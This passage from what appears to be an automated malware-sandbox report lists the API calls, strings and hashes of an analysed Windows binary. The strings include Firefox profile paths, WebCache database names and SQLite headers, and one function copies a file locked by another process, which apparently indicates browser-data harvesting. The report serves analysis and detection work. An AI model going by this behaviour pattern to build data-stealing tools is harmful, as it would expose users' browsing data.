                                                                                                                                                                • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                                                                                • Opcode Fuzzy Hash: 42456554a4125e12c9760a290a1ae7f8766add3746ffa376f76814c589a7dd26
                                                                                                                                                                • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 00403C09
                                                                                                                                                                • memset.MSVCRT ref: 00403C1E
                                                                                                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                  • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                                  • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                                • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                                                                                                • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                • API String ID: 1534475566-1174173950
                                                                                                                                                                • Opcode ID: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                                                                                                • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                                                                • Opcode Fuzzy Hash: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                                                                                                • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                • memset.MSVCRT ref: 00414C87
                                                                                                                                                                • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                  • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                                Strings
                                                                                                                                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                • API String ID: 71295984-2036018995
                                                                                                                                                                • Opcode ID: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                                                                                • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                                                • Opcode Fuzzy Hash: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                                                                                • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • wcschr.MSVCRT ref: 00414458
                                                                                                                                                                • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                • String ID: "%s"
                                                                                                                                                                • API String ID: 1343145685-3297466227
                                                                                                                                                                • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                                                                                • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                                • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                                                                                • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                                                                                • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                                • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                • API String ID: 1714573020-3385500049
                                                                                                                                                                • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                                                • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 004087D6
                                                                                                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                  • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                                • memset.MSVCRT ref: 00408828
                                                                                                                                                                • memset.MSVCRT ref: 00408840
                                                                                                                                                                • memset.MSVCRT ref: 00408858
                                                                                                                                                                • memset.MSVCRT ref: 00408870
                                                                                                                                                                • memset.MSVCRT ref: 00408888
                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2911713577-0
                                                                                                                                                                • Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                                                                                                • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                                                                • Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                                                                                                • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcmp
                                                                                                                                                                • String ID: @ $SQLite format 3
                                                                                                                                                                • API String ID: 1475443563-3708268960
                                                                                                                                                                • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                                • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _wcsicmpqsort
                                                                                                                                                                • String ID: /nosort$/sort
                                                                                                                                                                • API String ID: 1579243037-1578091866
                                                                                                                                                                • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                                                                                • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                                • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                                                                                • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 0040E60F
                                                                                                                                                                • memset.MSVCRT ref: 0040E629
                                                                                                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                Strings
                                                                                                                                                                • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                                • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                                                                                                • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                                • API String ID: 2887208581-2114579845
                                                                                                                                                                • Opcode ID: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                                                                                                • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                                                • Opcode Fuzzy Hash: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                                                                                                • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3473537107-0
                                                                                                                                                                • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                                • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                                • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                                                                • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset
                                                                                                                                                                • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                • API String ID: 2221118986-1725073988
                                                                                                                                                                • Opcode ID: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                                                                                                • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                                • Opcode Fuzzy Hash: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                                                                                                • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ChangeCloseFindNotificationSleep
                                                                                                                                                                • String ID: }A
                                                                                                                                                                • API String ID: 1821831730-2138825249
                                                                                                                                                                • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                                                • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@DeleteObject
                                                                                                                                                                • String ID: r!A
                                                                                                                                                                • API String ID: 1103273653-628097481
                                                                                                                                                                • Opcode ID: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                                                                                                • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                                                • Opcode Fuzzy Hash: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                                                                                                • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??2@
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1033339047-0
                                                                                                                                                                • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                                • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                • memcmp.MSVCRT ref: 00444BA5
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$memcmp
                                                                                                                                                                • String ID: $$8
                                                                                                                                                                • API String ID: 2808797137-435121686
                                                                                                                                                                • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                                • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                  • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                  • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                  • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                  • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                  • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                  • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                  • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                  • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                                                                  • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                  • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                  • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                                                                                                                                                • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                                • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                                                                                  • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                  • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                  • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1042154641-0
                                                                                                                                                                • Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                                                                                                • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                                                • Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                                                                                                • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                • memset.MSVCRT ref: 00403A55
